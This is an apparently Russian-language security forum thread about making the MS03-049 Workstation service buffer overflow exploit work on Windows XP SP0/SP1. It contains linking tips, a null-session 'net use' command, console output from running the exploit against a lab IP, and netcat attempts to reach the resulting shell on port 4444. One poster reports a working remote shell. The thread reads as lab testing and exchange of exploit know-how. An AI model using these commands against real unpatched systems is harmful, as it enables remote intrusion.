версию эксплоита которая лежит на СекЛабе конечно же линковать необходимо с mpr.lib, сорри если кого ввел в заблуждение, просто изначально я писал свой код по материалам eEye и у меня линкуется с netapi32.lib (правда пришлось его пересобрать  [IMG]http://www.securitylab.ru/forum/smileys/smiley1.gif[/IMG] по причине отсутствия NetAddAlternateComputerName) вот так ... и никаких там LoadLibrary.

сейчас есть рабочая версия XP+SP1 [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]
-----
то 47: может нам махнуться версиями? для так сказать для обмена опытом  [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]

Насчет модификации под XP

C:\test>Workst.exe
ms03-049 wkksvc.dll buffer overflow by wirepair.
...

C:\test>net use \\192.168.100.100 /u:"" ""
The command completed successfully.

C:\test>Workst.exe 192.168.100.100
Attacking: 192.168.100.100

\\192.168.100.100
GetProcAddr: 71c5679e
Sending exploit, you should be able to nc to the host
Result = 00000032

C:\test>nc -vv -n 192.168.100.100 4444
(UNKNOWN) [192.168.100.100] 4444 (?): connection refused
sent 0, rcvd 0: NOTSOCK

-----------

Спл был исправлен и немного изменена детализация сообщений. Result - результат вызова NetAddAlternateComputerName - 0x00000032 = "The request is not supported".

В роли цели - тестовая машина с XP SP0, спл удаленно не срабатывает будучи запущенным с XP SP0-1, при этом, если запустить спл локально на SP0, и указать её же IP, то порт открывается. Неужто бага только локально сплоитируемая???

2Admin:

"К сожалению, вы не можете отвечать на сообщения. Ваш IP-адрес внесён в "чёрный список"."

За что забанили?

Я в качестве тестовой использовал машину с ХР SP1(eng) со всеми обновлениями (кроме workstation, конечно). Запускался эксплоит с точно такой-же тачки. Результат- remote shell после запуска nc ip.ip.ip.ip 4444